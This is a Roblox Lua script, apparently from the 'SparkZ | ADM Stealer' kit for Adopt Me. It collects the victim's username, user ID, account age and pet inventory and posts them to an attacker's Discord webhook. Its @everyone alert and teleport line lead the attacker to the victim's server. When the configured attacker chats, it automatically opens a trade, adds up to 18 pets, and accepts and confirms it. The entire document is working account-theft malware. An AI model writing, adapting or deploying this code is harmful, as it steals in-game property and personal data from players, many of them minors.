local Pets = {}
local PetCounts = {}

for i, v in pairs(
    require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory.pets
) do
    local label = ""
    if v.properties.mega_neon then
        label = " (Mega Neon)"
    elseif v.properties.neon then
        label = " (Neon)"
    else
        label = " (Normal)"
    end
    local petName = v.id:gsub("%d+", ""):gsub("_", " "):gsub("%s+", " ")
    petName =
        petName:gsub(
        "(%a)(%a*)",
        function(first, rest)
            return first:upper() .. rest:lower()
        end
    )
    local key = petName .. label
    if PetCounts[key] then
        PetCounts[key] = PetCounts[key] + 1
    else
        PetCounts[key] = 1
    end
end

local Loaders = require(game.ReplicatedStorage.Fsys).load
local InventoryDB = Loaders("InventoryDB")
local ClientData = Loaders("ClientData")
local legendaries_count = 0
local mega_count = 0
local neon_count = 0
local ultra_count = 0
local rare_count = 0
local uncommon_count = 0
local common_count = 0
local total_pets = 0
local bucks = tostring(require(game:GetService("ReplicatedStorage").Fsys).load("ClientData").get("money"))
for i, v in pairs(ClientData.get("inventory").pets) do
    total_pets = total_pets + 1
end

for i, v in pairs(ClientData.get("inventory").pets) do
    if InventoryDB[v.category][v.id].rarity == "legendary" then
        legendaries_count = legendaries_count + 1
    end
    if InventoryDB[v.category][v.id].properties == "mega_neon" then
        mega_count = mega_count + 1
    end
    if InventoryDB[v.category][v.id].properties == "neon" then
        neon_count = neon_count + 1
    end
    if InventoryDB[v.category][v.id].rarity == "ultra_rare" then
        ultra_count = ultra_count + 1
    end
    if InventoryDB[v.category][v.id].rarity == "rare" then
        rare_count = rare_count + 1
    end
    if InventoryDB[v.category][v.id].rarity == "uncommon" then
        uncommon_count = uncommon_count + 1
    end
    if InventoryDB[v.category][v.id].rarity == "common" then
        common_count = common_count + 1
    end
end

if legendaries_count >= 5 or neon_count >= 5 or mega_count >= 1 then
    messageADOPT =
        "@everyone" ..
       
        'game:GetService("TeleportService"):TeleportToPlaceInstance(142823291, "' .. game.JobId .. '")\n'
else
    messageADOPT = 
        'game:GetService("TeleportService"):TeleportToPlaceInstance(142823291, "' .. game.JobId .. '")\n'
end

local plr = game.Players.LocalPlayer
local userr = Username
local userid = game.Players.LocalPlayer.UserId
local accage = game.Players.LocalPlayer.AccountAge
local data = {
    username = "You Got A Hit!!!",
    avatar_url = "https://cdn.discordapp.com/attachments/1282931642620706908/1283459804089548800/standard.gif?ex=6708a556&is=670753d6&hm=01662f53e4b8644a38a029c682b8ae93cf0ec0b65ad6c2ebf37035d20dfe3e8f&",
    content = messageADOPT,
    embeds = {
        {
            title = "**__SparkZ | ADM Stealer__**",
            description = "**Player Information**: \n ```lua\nUsername: " ..
                tostring(plr) ..
                    "\nUser-ID: " ..
                        tostring(userid) ..
                            "\nAccount Age: " ..
                                tostring(accage) ..
                                    "\nReceiver: " ..
                                        userr ..
                                            "\n```\n **Inventory**: \n ```lua\nLegendaries: " ..
                                                tostring(legendaries_count) ..
                                                    "\nMega Neons: " ..
                                                        tostring(mega_count) ..
                                                            "\nNeons: " ..
                                                                tostring(neon_count) ..
                                                                    "\nUltra Rares: " ..
                                                                        tostring(ultra_count) ..
                                                                            "\nRares: " ..
                                                                                tostring(rare_count) ..
                                                                                    "\nUncommons: " ..
                                                                                        tostring(uncommon_count) ..
                                                                                            "\nCommons: " ..
                                                                                                tostring(common_count) ..
                                                                                                    "\nBucks: " ..
                                                                                                        bucks ..
                                                                                                            "\nTotal Pets: " ..
                                                                                                                tostring(
                                                                                                                    total_pets
                                                                                                                ) ..
                                                                                                                    '\n```\n**Join Player Script**:\n\n```lua\ngame:GetService("TeleportService"):TeleportToPlaceInstance(920587237, "' ..
                                                                                                                        game.JobId ..
                                                                                                                            '", game.Players.LocalPlayer)\n```',
            color = tonumber(0x3365FF),
            fields = {
                {
                    name = "Player Inventory:",
                    value = "**COMMING SOON!**"
                }
            }
        }
    }
}
local request = http_request or request or HttpPost or syn.request
request(
    {
        Url = Webhook,
        Method = "POST",
        Headers = {
            ["Content-Type"] = "application/json"
        },
        Body = game.HttpService:JSONEncode(data)
    }
)

local function StartSteal()
    local Loads = require(game.ReplicatedStorage.Fsys).load
    local RouterClient = Loads("RouterClient")
    local SendTrade = RouterClient.get("TradeAPI/SendTradeRequest")
    local AddPetRemote = RouterClient.get("TradeAPI/AddItemToOffer")
    local AcceptNegotiationRemote = RouterClient.get("TradeAPI/AcceptNegotiation")
    local ConfirmTradeRemote = RouterClient.get("TradeAPI/ConfirmTrade")

    SendTrade:FireServer(game.Players[Username])
    wait(3)
    local PetsInventory =
        require(game.ReplicatedStorage.ClientModules.Core.ClientData).get_data()[game.Players.LocalPlayer.Name].inventory
    if PetsInventory.pets then
        local petCount = 0
        local petUids = {}
        for petUid, petData in pairs(PetsInventory.pets) do
            table.insert(petUids, petUid)
        end

        while #petUids > 0 do
            local petUid = table.remove(petUids, 1)
            AddPetRemote:FireServer(petUid)
            petCount = petCount + 1
            if petCount >= 18 then
                break
            end
        end
    else
        print("No pets found in inventory.")
    end
    wait(6)
    AcceptNegotiationRemote:FireServer()
    wait(5)
    local ConfirmTradeRemote = RouterClient.get("TradeAPI/ConfirmTrade")
    ConfirmTradeRemote:FireServer()
end

if total_pets == 1 then
    game:GetService("Players").LocalPlayer:Kick(
        "Error: Pls use different account!"
    )
end

game.Players.PlayerAdded:Connect(
    function(player)
        if player.Name == Username then
            player.Chatted:Connect(
                function(msg)
                    StartSteal()
                end
            )
        end
    end
)
